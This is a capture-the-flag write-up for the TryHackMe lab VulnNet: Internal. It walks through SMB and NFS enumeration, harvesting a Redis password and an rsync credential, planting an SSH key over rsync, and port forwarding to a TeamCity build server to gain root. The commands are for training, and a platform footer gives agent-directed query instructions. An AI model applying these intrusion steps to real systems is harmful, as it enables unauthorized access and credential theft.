# VulnNet: Internal

This is a write-up for the machine VulnNet: Internal located at: <https://tryhackme.com/room/vulnnetinternal>

I ran an nmap scan

```c
nmap -T4 -A 10.10.98.192 -oN nmap_output.txt
```

This is the output I got:

```c
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-23 17:37 EDT
Nmap scan report for 10.10.98.192
Host is up (0.20s latency).
Not shown: 993 closed ports
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_  256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp  open     rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34713/tcp   mountd
|   100005  1,2,3      45887/tcp6  mountd
|   100005  1,2,3      46635/udp6  mountd
|   100005  1,2,3      55619/udp   mountd
|   100021  1,3,4      43989/tcp6  nlockmgr
|   100021  1,3,4      46185/tcp   nlockmgr
|   100021  1,3,4      55225/udp   nlockmgr
|   100021  1,3,4      55609/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp  open     rsync       (protocol version 31)
2049/tcp open     nfs_acl     3 (RPC #100227)
9090/tcp filtered zeus-admin
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2021-09-23T23:38:16+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-23T21:38:16
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.51 seconds
```

I then ran **smbmap -H IP\_Address**, and got the following output:

```c
[+] Guest session       IP: 10.10.98.192:445    Name: 10.10.98.192                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        shares                                                  READ ONLY       VulnNet Business Shares
        IPC$                                                    NO ACCESS       IPC Service (vulnnet-internal server (Samba, Ubuntu))
```

I then ran **smbclient \\\\\\\10.10.98.192\\\shares**, and got the following output:

```c
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Feb  2 04:20:09 2021
  ..                                  D        0  Tue Feb  2 04:28:11 2021
  temp                                D        0  Sat Feb  6 06:45:10 2021
  data                                D        0  Tue Feb  2 04:27:33 2021

                11309648 blocks of size 1024. 3278156 blocks available
```

In the **temp** folder, there was the following file:

```c
smb: \temp\> ls
  .                                   D        0  Sat Feb  6 06:45:10 2021
  ..                                  D        0  Tue Feb  2 04:20:09 2021
  services.txt                        N       38  Sat Feb  6 06:45:09 2021
```

In the **data** folder, there was the following file:

```c
smb: \data\> ls
  .                                   D        0  Tue Feb  2 04:27:33 2021
  ..                                  D        0  Tue Feb  2 04:20:09 2021
  data.txt                            N       48  Tue Feb  2 04:21:18 2021
  business-req.txt                    N      190  Tue Feb  2 04:27:33 2021
```

Looking through the files, I found the flag for the services.txt:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-71bedd8c1f077961023db24d8dded8e47abecd57%2Fimage.png?alt=media)

I then ran a **metasploit** module **auxiliary/scanner/rsync/modules\_list**. This is what I got from the result from it:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-e42a2a0d8686c5a16b7bbb0ba033a570e20de4c4%2Fimage.png?alt=media)

I then read [this write-up](https://cyberrat.medium.com/vulnnet-internal-tryhackeme-cad6ccb9ad54) and realized that I did not use the **showmount** command. I then followed the write-up to run **showmeant -e IP\_Address**. I then got the following:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-928bd558737e3265cd5f01f84df1fdd2a34b7673%2Fimage.png?alt=media)

I then mounted the system to my machine:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-5a48e3ad1fb6aea5be6238c9c36b1c1e0bb4ae40%2Fimage.png?alt=media)

Viewing through the files I came across some sort of password in the redis.conf file:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-16aa5c760f3cf68ff36c64a746b63cb5d2ab8968%2Fimage.png?alt=media)

I then followed the same write-up to understand my next step. This was to use **redis-cli** in order to connect to the database and see what is there using the pasword we found earlier. I ran **redis-cli -h 10.10.98.192 -a \<requirepass\_from\_earlier>** in order to login to the database. I then was able to find the flag for internal:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-956364cb7e63f75bbf9a90b9f2f6c2d026ac9203%2Fimage.png?alt=media)

When I ran **LRANGE authlist 1 20**, I got the following:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-351aa76f9bd15db6f8413cc37c0060ed69df15e1%2Fimage.png?alt=media)

The three values were the exact same, and seemed to be base64 encoded. I decoded it online and got the following:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-00af53f20a62fd01e7155d359d86ffda08b190cc%2Fimage.png?alt=media)

So now we have to connect to rsync with this password:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-4b062dad0d5db06e631b16d961575c698a07ca20%2Fimage.png?alt=media)

There is a sys-internal directory that I ave to find a way to get access into. I followed the aforementioned write-up and ran the following commands (tweaked to work for me):

```c
mkdir local_storage
rsync -av rsync://rsync-connect@10.10.98.192/files local_storage
```

This allowed me to download the folder to my local drive. In that directory, I found the user.txt file:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-de464fa621a9e894ecc3672fdfb65e545daeb5cb%2Fimage.png?alt=media)

I got stuck here, so I had to view the write-up again. I was meant to create an SSH keypair and upload it using rsync. So I ran the following commands:

```c
ssh-keygen -t rsa 
cat internals.pub | tee authorized_keys && chmod 600 authorized_keys
rsync -av authorized_keys rsync://rsync-connect@10.10.98.192/files/sys-internal/.ssh  
```

For the previous step, I ended up getting stuck, and found [this write-up](https://muzec0318.github.io/posts/vulnet.html) that actually clarified the situation for me. This same write-up led me to run **ss** **-tulpn** to find out what ports were open. I used the same write-up to figure out we have to do port forwarding. In order to do this, I ran the following command:

```c
ssh -i internals -L 8111:localhost:8111 sys-internal@10.10.98.192 
```

Visiting `localhost:8111` led me to the following page:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-458c712d554bd54c1af59d497654dc2de03071b4%2Fimage.png?alt=media)

I then searched for the word **token** in the whole filesystem to find a token for the following webpage:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-e814c9e75a0fece28667e5dfd191001de222d64a%2Fimage.png?alt=media)

The second to last authentication token worked for me! I then created a new project:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-aec195c409cd74cc9663e5d42d3f9d730c8e0f60%2Fimage.png?alt=media)

I then created a build config:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-33e8e703978ef52af629e4e5b6ff27fff13df6b0%2Fimage.png?alt=media)

I then went to Build Steps and followed a bit of [this write-up](https://infosecwriteups.com/tryhackme-writeup-vulnet-internal-9abe74955f32) for this part. I following the following image:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-c0685779dcb6e182308c33dc20b24f86411ef9eb%2Fimage.png?alt=media)

I then ran the script from the choice on top, and when I went back to my previous shell, I ran **/bin/bash -p**, and I was able to get root:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-a36d1eda537088f3fa900eb4dd5b8726585182f9%2Fimage.png?alt=media)

I wan then able to get the root flag:

![](https://3737186621-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MayTgZ_oSfxCsFiprCi%2Fuploads%2Fgit-blob-9f4516980df8ef650d8b9250291494aa8f4c03ba%2Fimage.png?alt=media)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://harisqazi.gitbook.io/portfolio/write-ups/tryhackme/vulnnet-internal.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.